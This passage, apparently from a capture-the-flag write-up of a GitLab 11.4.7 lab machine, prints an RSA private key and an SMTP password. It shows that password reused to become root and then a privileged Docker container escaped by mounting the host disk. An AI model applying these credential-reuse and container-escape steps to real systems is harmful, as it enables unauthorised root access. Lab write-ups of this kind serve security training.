2qDV/lxC/V2jUPRcaot\n4a9w1tf2AvOcMxeBxsepo4dEIlGTA9ooho1KYfnNzdPzqHEAFrDTpOq11r+WElO/\nLS9MMng2qYlIc3OiglegtdH8NQp6A7HNIaVmfSp52xqTKwp9r4lCCakjzv6D30kf\nfwTnBnbc5+xyBnvY9gQxTfa6sGoPMAGanZEfuafftpMkZqWu2Fu5nXirHINDi6q/\n56baaEmxMhJLdwKCAQEAxcExoYHj0yDX3WKatn0DEjnkzP7HypgIv2dYl7pRfinY\n4/b5JTgCdZCutd0VWKQT+/dhh/BrT2UpNf/GOjcpNAM3M328h3xt582cZEz2Ygp/\nu/WGpGeyZZsVsL7nR9KnlLIzHtiEKUX1R2krWHtsB21hMUC+Yt/YofyArUrJCw4a\nsNioDY72DqXIvfC9zIZWVlrJwMyuYpjtVO8qt48Fvtk1nlbu6rI4sbOf3dOo7WJi\nUTkJzApGL2Wxm+q49ysETPTalHzfy1J4GEyzTb2jQnWYUKKr+k3/UBEsdMb6eUjm\nQz5I44/hLB81FCD9KhU7QPeywrDyhYTOmUI5yyBwHQKCAQEAiiX7+5RZHzSFJpX1\ngrYxG8/hbsmLMEH4w5eHSvyLPry7ErG1Z6do0fjVtavSbuVim8bbpld8dJIaxGX0\neI2vR2RtElzrIwPz63UwdVeXzkeSeSQjg3Dp2RI3E3CL6nex30GDCz5EuBQKqVDu\nwxWTi3PAGcuXk+mjNtztRMd5ja+ZnEj4Wmqu9j3asqtSiCCGnWVzuJqG/xQIUrAI\nzAQQ1RYezZYSJyruKGKFE7ydKCderMxq8aWl/mnzPHIOlJlkyRIxYBtBlT9DvTuM\nLwFhd/HJ/d3D0NZyr3+Wa6MZFj2O7eRaVYLel/q4+SO5vVtUh9rHn+71DsgHtU3u\nOIxkwwKCAQAP0IBgkxueEb1RlgYbW+n39itG/YUKvZfNfr1F/P9xYHVY3bJU+KKx\nti1Sm+iOGykB+GmTTnW2dreR+u9mTmz8HNm4Q3DlQN0lMXs1RjZZ5s8KP/tRgH1y\nxLE6Xjnus3j1Wj7eU6BWEKMp3844mD4uZd/k6XGQRKh1Y9UChr2HJcyaoejmlK02\nxKlGD0+OYJvc8gu6YGP9vI8WQL4gyc5C0eoIzJj0qeYAyAWb3sZenYSRTEdtStEM\nD0zh1CaQlZ8VbGtifo4DG4hBITkhmW3J7c+Ne0TXko89XvI4MIVtV5gafoujryjp\nt2EuR+kXCXWgn25rRW1PoixHc1Vd2i09AoIBAQCmy+8mQSnCw9c6GDxDMtnyxqjQ\nrzLgaRFLVZnWDD8/XTilpfTbgQkFHWKO8HzTOQZpo7r/8VgQ5F/ag31Rt7RFKjee\n+KnjxsnIVcAnUvuNndAnb7C7zxWHlwAeknLWYBei3Ir+5rnMUVq7rHhRgGLu3cEU\nWG0giPGkL/IeQ0hsNEz6gqCDkmssBJnLj3QYykzXNsPS7QCsExAu5YvP1XZvBjHd\n5RH74fkBR1ksAIGqRxVk4yR4p12eyhI2yKOzm9z86C9CVwfuo5LK2NMRCfjXdTnO\nukRO4CCUJ2MiSO+GeUhybtsYf4nuFqxCJa4KptiFLQ6EQqHtmpx0aPK6Wgc6\n-----END RSA PRIVATE KEY-----\n"
  }
}
```

Nothing interesting here..

### Token Found

Command used: `cat gitlab.rb`

```ruby theme={null}
### GitLab email server settings
###! Docs: https://docs.gitlab.com/omnibus/settings/smtp.html
###! **Use smtp instead of sendmail/postfix.**

# gitlab_rails['smtp_enable'] = true
# gitlab_rails['smtp_address'] = "smtp.server"
# gitlab_rails['smtp_port'] = 465
# gitlab_rails['smtp_user_name'] = "smtp user"
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
# gitlab_rails['smtp_domain'] = "example.com"
# gitlab_rails['smtp_authentication'] = "login"
# gitlab_rails['smtp_enable_starttls_auto'] = true
# gitlab_rails['smtp_tls'] = false
```

`smtp_password` looks like a root password!

## Privilege Escalation to Root with the Found Credentials

```bash theme={null}
su

"
Password: wW59U!ZKMbG9+*#h

root@gitlab:/opt/backup#
"
```

## Mounting the Filesystem

### Checking if the docker has a privilege to access local resources

```bash theme={null}
cat docker-compose.yml
version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://172.19.0.2'
        redis['bind']='127.0.0.1'
        redis['port']=6379
        gitlab_rails['initial_root_password']=File.read('/root_pass')
    networks:
      gitlab:
        ipv4_address: 172.19.0.2
    ports:
      - '5080:80'
      #- '127.0.0.1:5080:80'
      #- '127.0.0.1:50443:443'
      #- '127.0.0.1:5022:22'
    volumes:
      - './srv/gitlab/config:/etc/gitlab'
      - './srv/gitlab/logs:/var/log/gitlab'
      - './srv/gitlab/data:/var/opt/gitlab'
      - './root_pass:/root_pass'
      - '/opt/user:/home/dude/'
    privileged: true
    restart: unless-stopped
    #mem_limit: 1024m

networks:
  gitlab:
    driver: bridge
    ipam:
      config:
        - subnet: 172.19.0.0/16
```

> The `privileged: true` option in a `docker-compose.yml` file is used to give a Docker container full access to the host's resources, such as the host's devices, system calls, and network stack. - [stackoverflow](https://stackoverflow.com/questions/69052575/how-to-bring-up-a-docker-compose-container-as-privileged)

```bash theme={null}
lsblk

"
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop1    7:1    0 55.5M  1 loop 
loop4    7:4    0 31.1M  1 loop 
loop2    7:2    0 71.4M  1 loop 
loop0    7:0    0 55.4M  1 loop 
sda      8:0    0   10G  0 disk 
|-sda2   8:2    0  9.5G  0 part /var/opt/gitlab
|-sda3   8:3    0  512M  0 part [SWAP]
|-sda1   8:1    0    1M  0 part 
loop5    7:5    0 31.1M  1 loop 
loop3    7:3    0 71.3M  1 loop
"
```

Analyzing the filesystem, we want to know the specific directory to get our root credentials. (/dev/sda2)

```bash theme={null}
mount /dev/sda2 /mnt
cd /mnt
ls

"
bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr
boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var
"
```

Once you mount the disk and change current directory to the `/mnt` filesystem, you are in!

# Reference

* [https://packetstormsecurity.com/files/160516/GitLab-11.4.7-Remote-Code-Execution.html](https://packetstormsecurity.com/files/160516/GitLab-11.4.7-Remote-Code-Execution.html)
* [https://www.youtube.com/watch?v=LrLJuyAdoAg](https://www.youtube.com/watch?v=LrLJuyAdoAg)
* [https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/)
* [https://0xdf.gitlab.io/2021/05/15/htb-ready.html#shell-as-root-host](https://0xdf.gitlab.io/2021/05/15/htb-ready.html#shell-as-root-host)
* [https://stackoverflow.com/questions/69052575/how-to-bring-up-a-docker-compose-container-as-privileged](https://stackoverflow.com/questions/69052575/how-to-bring-up-a-docker-compose-container-as-privileged)
